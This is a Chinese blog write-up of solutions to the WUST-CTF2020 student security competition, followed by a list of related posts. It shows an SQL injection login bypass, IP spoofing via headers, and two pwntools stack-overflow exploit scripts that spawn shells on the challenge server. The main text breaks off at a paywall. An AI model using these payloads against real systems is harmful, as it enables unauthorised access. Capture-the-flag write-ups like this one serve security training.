WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP

最新推荐文章于 2025-04-07 16:28:12 发布
最新推荐文章于 2025-04-07 16:28:12 发布
阅读量3.7k 收藏 6
点赞数 4
分类专栏: WCTF2020 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45461609/article/details/105166662
版权
本文详细介绍了武汉科技大学第一届WUST-CTF网络安全竞赛的解题过程,涵盖Web、PWN、Crypto等多个类别。在Web部分,讲解了如何利用漏洞获取信息;在PWN环节,展示了getshell的技巧;而在Crypto领域,通过大数运算、RSA等题目解析加密解密方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

WUST-CTF2020

Web

check in

修改maxlength,删除按钮的disabled,输入作者名52HeRtz即可登录
收到窗口信息一个博客地址,进入。
Ctrl+U查看源码,在末尾发现一半flag
在这里插入图片描述
继续找在“远古的博客”中找到另一半
在这里插入图片描述

wctf2020{can_y0u_can_a_can_a5_a_c@nner_can_Can_@_can}

admin(不会web勉强做出)

用户名:

admin

JSP万能密码:

1'or'1'='1

登录后页面提示,必须本地ip才能访问,想到用抓包添加XFF来伪造IP
在这里插入图片描述
Action->Send to Repeater->Go
在这里插入图片描述
页面提示用GET传参,停止抓包,在原网址末尾添加

?ais=520

抓包,重复上面的操作,得到新提示,用POST传参
在这里插入图片描述
与GET类似,用hackbar POST

wust=1314

后得到提示离flag很近了,得到一串字符

4dz  aste.ubuntu.com/p/    https://p  Rqr  cSf2

在这里插入图片描述
将字符串HTML解码
在这里插入图片描述
将网址拼接起来得:

https://paste.ubuntu.com/p/cSf24dzRqr

进入得

d2N0ZjIwMjB7bjB3X3lvdV9rbjB3X3RoZV9iYXNpY18wZl9zcWxfYW5kX2h0dHB9

base64解码得:

wctf2020{n0w_you_kn0w_the_basic_0f_sql_and_http}

PWN

getshell

没什么好说的,真·签到题

from pwn import*
#r=process('./getshell')
r=remote('47.97.40.187',12333)
sys_addr=0x0804851b
payload='a'*0x18+'a'*4+p32(sys_addr)
r.sendline(payload)
r.interactive()

wctf2020{E@sy_get_shel1}

getshell2

在这里插入图片描述
在这里插入图片描述
没有buf段让我们写入"/bin/sh",也没有现成的"/bin/sh"让我们使用,但是需要知道的是只需要"sh"便能getshell
注意到这里的read允许的最大长度为36,buf可容纳的长度为0x18=24,所以实现栈溢出覆盖返回地址的长度为28,所以只有8个字节能让我们写syscall
如果我们调用plt表的system函数地址,是需要继续压入一个system返回地址的,这两个地址的长度已经达到了8个字节,没有位置来输入"sh"的地址,所以想到程序里是否有call system直接让我们调用,这样就不用压入返回地址,就能省4个字节来压入"sh"的地址
在这里插入图片描述
在shell函数的汇编代码里找到了,所以将栈溢出后的返回地址直接改为0x08048529就行了,现在找"sh"的地址,用ROPgadget
在这里插入图片描述
exp:

from pwn import*
#r = process('./getshell-2')
r = remote('47.97.40.187', 12334)
sh_addr = 0x08048670
sys_addr = 0x08048529
payload = flat(['a'*28, sys_addr, sh_addr])
r.sendline(payload)
r.interactive()

wctf2020{Sh_Als0_w0rks}

number game

整数溢出
讲讲我做题中的思路:
写了个C++程序测试数字:

#include<iostream>
#include<climits>
#include<math.h>
using namespace std;
int main(){
   
	int a;
	cout<<INT_MAX<<endl;//打印出int能取的最大值
	cin>>a;
	cout<<a<<endl;
	if (a<0){
   
		a=-a;
		if(a
最低0.47元/天 解锁文章
buu-[WUSTCTF2020]Cr0ssfun
qaq517384的博客
03-13 636
64位无壳 冇趣的字符串 跟进主函数 while ( 1 ) { puts("Input the flag"); __isoc99_scanf("%s", &v4); if ( (unsigned int)check(&v4) == 1 ) break; puts("0ops, your flag seems fake."); puts("=============================="); rewind(_b
web签到题之前端修改 —— 【WUST-CTF2020】checkin
Ve99tr’s Blog
03-30 1494
最近去蹭了一波武汉科技大学的“练手赛”,收获蛮多,更一下wp web签到题,前端修改,然后check,check,check
WUST-CTF2020
Ater的博客
07-10 193
Web checkin 打开题目链接 发现submit for flag是虚的不能点 查看元素找到了问题 首先是disable,然后是maxlength,dis删掉,长度改为10 把题目里的作者放上去提交 的到弹窗 然后进入网址 这里弹出字发现会出现wctf2020{ 查看元素 flag只有半个 再看看题目弹框:远古的博客 确实有一个远古的博客,得到了后半部分 Misc 比赛...
BUUCTF(Misc)——基础破解
最新发布
weixin_74738833的博客
04-07 326
BUUCTF(Misc)——基础破解
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3443
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
[WUSTCTF2020]朴实无华
Lumos427的博客
04-16 951
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "鎴戜笉缁忔剰
WUST-CTF2020-WP
夏日 の blog
03-29 5535
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
RSA的dp泄露 —— 【WUST-CTF2020】leak
Ve99tr’s Blog
03-30 5149
RSA的dp泄露 && gmpy2安装
ZIP爆破&图片outguess隐写 —— 【WUST-CTF2020】Alison likes jojo
Ve99tr’s Blog
03-30 2507
ZIP爆破以及图片的outguess隐写
WEB狗的各种绕过 —— 【WUST-CTF2020】朴实无华
Ve99tr’s Blog
03-30 4763
web狗的各种绕过:intval函数绕过、双重MD5以及==弱类型、空格过滤绕过
[WUSTCTF2020]朴实无华_WP
Accompany的博客
02-12 3724
题目一览 文章目录题目一览分析获取flag标题Level 1Level 2get flag 分析 打开题目,除了hack me,没有得到可利用信息,查看源码 虽然编码有一点问题,但还是发现了这个利用点bot,想到robots.txt网站的爬虫规则 robots.txt置于网站的根目录下。爬虫根据此文件决定网站下的哪些页面是被授权抓取的 robots.txt 意为对任何爬虫,禁止其访问/fAke_f1agggg.php目录下的文件 但对于这个提示,我们明显是要访问看看有无可利用信息 /fAke_f
第五十四题——[WUSTCTF2020]朴实无华
分享简单的安全技术
04-29 743
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,访问/robots.txt文件看到提示/fAke_f1agggg.php 第二步:访问/fAke_f1agggg.php,看到提示:/fl4g.php 第三步:访问/fl4g.php看到源码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 1780
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-优快云博客 <?php header('Content-type:text/html;charset=
[WUSTCTF2020]朴实无华 刷题记录
EC_Carrot的博客
12-16 417
题目 打开后题目就只有hackme这串字符,但是看到标题有bot字样,可以试试robots.txt文件里面有没有东西 进到那个文件后,写着flag{this_is_not_flag}一看就知道不是flag,再找找头 看到fl4g.php文件,再进去 level1 GET传参num,而且num的值既要小于2020,加1后又要大于2021 为了绕过,再看看这张图 来源:https://www.runoob.com/php/php-intval-function.html 里面提到一点: echo in
[WUSTCTF2020]level4 wp
weixin_47158947的博客
08-06 927
1.ida打开 发现什么都没有, 但是注意struct ,left, right,data structure 用kail运行一下 先说了type1和type2,但是type3不给说,就是flag了, 主要是得知道1和2是那种遍历方式 肯定有一种是中序遍历! 这俩个开头都一样,那就没有先序遍历了 这道题的flag就是先序了,wuctf,后序遍历最后一个应该是w 然后根据自己学的知识获得flag wctf2020{This_IS_A_7reE} ...
【Web】WUSTCTF 2020 部分题解
uuzeray的博客
04-15 501
1/**/UnIon/**/select/**/1,2,3# //回显3。改Content-Type,文件内容加个GIF89a魔数。访问/fAke_f1agggg.php。随便注册个账号,更换头像功能存在文件上传。抓包看响应头看到/f14g.php。第一反应搜CVE,但没搜到有用的。过滤了空格,测出来有sql注入点。简单的bypass,不解释了。直接读环境变量拿到flag。访问/robots.txt。访问/f14g.php。可以搜索找到上传的路径。连接蚁剑,发现权限不够。
buu:[WUSTCTF2020]Cr0ssfun
weixin_60553183的博客
01-18 213
毫无难度的一道题 看到if里的check 一个一个按r出flag
[WUSTCTF2020]Cr0ssfun-buuctf
liulala987的博客
08-23 297
flag要一个一个拼 诶呀我真服了 我拼了很久。看到flag了 双击点进去。一直跟进 把数字转换为字符。F5大法查看伪c代码。
BUUCTF Reverse/[WUSTCTF2020]Cr0ssfun
ookami6497的博客
07-27 271
BUUCTF Reverse/[WUSTCTF2020]Cr0ssfun 先看文件信息, IDA64位打开,很简单的题目,只要一个个输入就行 都是返回的这种元素 _BOOL8 __fastcall iven_is_handsome(_BYTE *a1) { return a1[10] == 112 && a1[13] == 64 && a1[3] == 102 && a1[26] == 114
[WUSTCTF2020]朴实无华 1
01-07
### WUST CTF 2020 朴实无华 1 挑战详情与解决方案 #### 挑战概述 WUST CTF 2020 中的“朴实无华 1”是一个相对基础的信息隐藏类题目。参与者需要通过分析给定文件或提示来找到隐藏的信息并最终获取 flag。 #### 解决方案详解 对于此挑战,下载下来的文件可能看似一张普通的图片[^1]。然而,在右键点击该图像并查看其属性中的备注部分时,会发现存在一段盲文编码的内容。这段盲文字母实际上包含了指向下一步解谜的关键线索。 为了继续破解这一阶段的任务,可以利用在线工具或是编写简单的脚本来实现从盲文到常规字符集之间的转换工作。经过这样的处理之后,得到的结果字符串即为所需的 flag 形式:`wctf2020{y$0$u_f$1$n$d$_M$e$e$e$e$e}`。 值得注意的是,“朴实无华 1”的设计旨在考察参赛者对不同数据表示形式的理解以及快速检索有效信息的能力。这类问题通常不需要复杂的编程技巧,而是依赖于细致入微的观察力和灵活运用各种资源解决问题的方法。 ```python # Python 示例代码用于展示如何解析盲文至ASCII码(假设已知映射关系) braille_to_ascii = { "⠠⠁": 'a', "⠠⠃": 'b', ... , "⠠⠵": 'z' } def decode_braille(braille_string): decoded_message = "" words = braille_string.split(' ') for word in words: letters = [braille_to_ascii[char] if char in braille_to_ascii else '?' for char in word] decoded_word = ''.join(letters).capitalize() decoded_message += f"{decoded_word} " return decoded_message.strip() print(decode_braille("输入你的盲文")) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值